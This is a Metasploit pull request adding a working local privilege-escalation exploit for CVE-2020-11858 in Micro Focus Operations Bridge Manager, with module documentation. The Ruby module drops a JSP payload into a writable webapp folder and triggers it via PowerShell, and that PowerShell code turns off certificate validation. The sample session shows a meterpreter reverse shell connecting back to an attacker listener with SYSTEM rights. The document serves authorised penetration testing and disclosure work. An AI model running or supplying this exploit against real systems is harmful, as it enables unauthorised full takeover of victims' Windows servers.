### PR TITLE
Create exploit for CVE-2020-11858 / Micro Focus Operations Bridge Manager Local Privilege Escalation

### DIFF
--- a/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md
+++ b/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md
@@ -2,8 +2,10 @@
 
 This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge Manager.
 
-An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and then access it without authentication by making a request to the OBM server.
-This will result in automatic code execution as SYSTEM. This module has been tested on OBM 2020.05 and 2019.11, but it should work out of the box on earlier versions too.
+An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and then access it without authentication by making
+a request to the OBM server.
+This will result in automatic code execution as SYSTEM. This module has been tested on OBM 2020.05 and 2019.11,
+but it should work out of the box on earlier versions too.
 
 According to Micro Focus the vulnerable versions are:
 

--- a/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md
+++ b/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md
@@ -1,0 +1,56 @@
+## Vulnerable Application
+
+This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge Manager.
+
+An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and then access it without authentication by making a request to the OBM server.
+This will result in automatic code execution as SYSTEM. This module has been tested on OBM 2020.05, but it should work out of the box on earlier versions too.
+
+According to Micro Focus the vulnerable versions are:
+
+* Operations Bridge Manager versions: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older versions
+* Operations Bridge (containerized) versions: 2019.11, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05, 2018.02, 2017.11
+
+Installation docs are available at:
+
+* https://docs.microfocus.com/itom/Operations_Bridge_Manager:2020.05
+
+Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo.
+
+Only the Windows version of the product is affected.
+
+All details about these vulnerabilities can be obtained from the advisory:
+
+* https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. `use exploit/windows/local/microfocus_operations_privesc.rb`
+4. `set session SESSION`
+5. `set lhost YOUR_IP`
+6. `run`
+7. You should get a shell.
+
+## Scenarios
+
+```
+msf6 exploit(multi/handler) > use exploit/windows/local/microfocus_obm_dir_perm
+s
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/local/microfocus_obm_dir_perms) > set lhost 10.0.0.1
+lhost => 10.0.0.1
+msf6 exploit(windows/local/microfocus_obm_dir_perms) > set lport 4499
+lport => 4499
+msf6 exploit(windows/local/microfocus_obm_dir_perms) > set session 3
+session => 3
+msf6 exploit(windows/local/microfocus_obm_dir_perms) > run
+
+[*] Started reverse TCP handler on 10.0.0.1:4499
+[*] JSP dropped, calling it @ https://127.0.0.1:443/topaz/LB_Verify.jsp
+[*] Sending stage (175174 bytes) to 10.0.0.206
+[*] Meterpreter session 4 opened (10.0.0.1:4499 -> 10.0.0.206:65068) at 2021-01-29 16:00:43 +0700
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```

--- a/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md
+++ b/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md
@@ -3,7 +3,7 @@
 This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge Manager.
 
 An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and then access it without authentication by making a request to the OBM server.
-This will result in automatic code execution as SYSTEM. This module has been tested on OBM 2020.05, but it should work out of the box on earlier versions too.
+This will result in automatic code execution as SYSTEM. This module has been tested on OBM 2020.05 and 2019.11, but it should work out of the box on earlier versions too.
 
 According to Micro Focus the vulnerable versions are:
 

--- a/modules/exploits/windows/local/microfocus_operations_privesc.rb
+++ b/modules/exploits/windows/local/microfocus_operations_privesc.rb
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Exploit::Local
             'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
           ],
         'Platform' => 'win',
+        'Privileged' => true,
         'SessionTypes' => ['meterpreter'],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Targets' =>

--- a/modules/exploits/windows/local/microfocus_operations_privesc.rb
+++ b/modules/exploits/windows/local/microfocus_operations_privesc.rb
@@ -1,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Powershell
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Micro Focus Operations Bridge Manager Local Privilege Escalation',
+        'Description' => %q{
+          This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge
+          Manager.
+          An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and
+          then access it without authentication by making a request to the OBM server.
+          This will result in automatic code execution as SYSTEM. This module has been tested on
+          OBM 2020.05, but it should work out of the box on earlier versions too.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
+          ],
+        'Platform' => 'win',
+        'SessionTypes' => ['meterpreter'],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' =>
+          [
+            [
+              'Micro Focus Operations Bridge Manager <= 2020.05',
+              {
+                'Path' => 'C:\HPBSM\AppServer\webapps\site.war\LB_Verify.jsp'
+              }
+            ]
+          ],
+        'References' =>
+          [
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
+            [ 'CVE', '2020-11858'],
+            [ 'ZDI', '20-1326'],
+          ],
+        'DisclosureDate' => '2020-10-28',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
+    ])
+  end
+
+  def exploit
+    unless session.type == 'meterpreter'
+      fail_with(Failure::None, 'Only meterpreter sessions are supported')
+    end
+
+    unless have_powershell?
+      fail_with(Failure::None, 'No Powershell is installed on the host')
+    end
+
+    # according to /lib/msf/core/post/file.rb this is not binary safe on Windows, but we don't care, it's JSP
+    payload_jsp = Msf::Util::EXE.to_jsp(generate_payload_exe)
+    write_file(target['Path'], payload_jsp)
+
+    if datastore['SSL']
+      prefix = 'https://'
+      # Code below allows us to perform TLS requests to servers with self signed certs
+      # In Powershell 5.1, we can simply use -SkipCertificateCheck, but in older versions we need this
+      # Taken from https://stackoverflow.com/questions/11696944/powershell-v3-invoke-webrequest-https-error
+      ps_cmd = %[
+add-type @"
+using System.Net;
+using System.Security.Cryptography.X509Certificates;
+public class TrustAllCertsPolicy : ICertificatePolicy {
+    public bool CheckValidationResult(
+        ServicePoint srvPoint, X509Certificate certificate,
+        WebRequest request, int certificateProblem) {
+        return true;
+    }
+}
+"@
+$AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
+[System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
+[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
+]
+    else
+      prefix = 'http://'
+      ps_cmd = ''
+    end
+
+    uri = "#{prefix}127.0.0.1:#{datastore['RPORT']}#{datastore['TARGETURI']}topaz/LB_Verify.jsp"
+    print_status("JSP dropped, calling it @ #{uri}")
+    ps_cmd += "Invoke-WebRequest -Uri #{uri}"
+    execute_script(ps_cmd)
+  end
+end


### PR DESCRIPTION
This creates a local Windows exploit for CVE-2020-11858. See details at:
https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md (vulnerability 7).

It allows an unpriviliged user (such as Guest) to escalate privileges to SYSTEM.

1. Install the application
2. Start msfconsole
3. `use exploit/windows/local/microfocus_operations_privesc.rb`
4. `set session SESSION`
5. `set lhost YOUR_IP`
6. `run`
7. You should get a shell.

pcap's available on request!
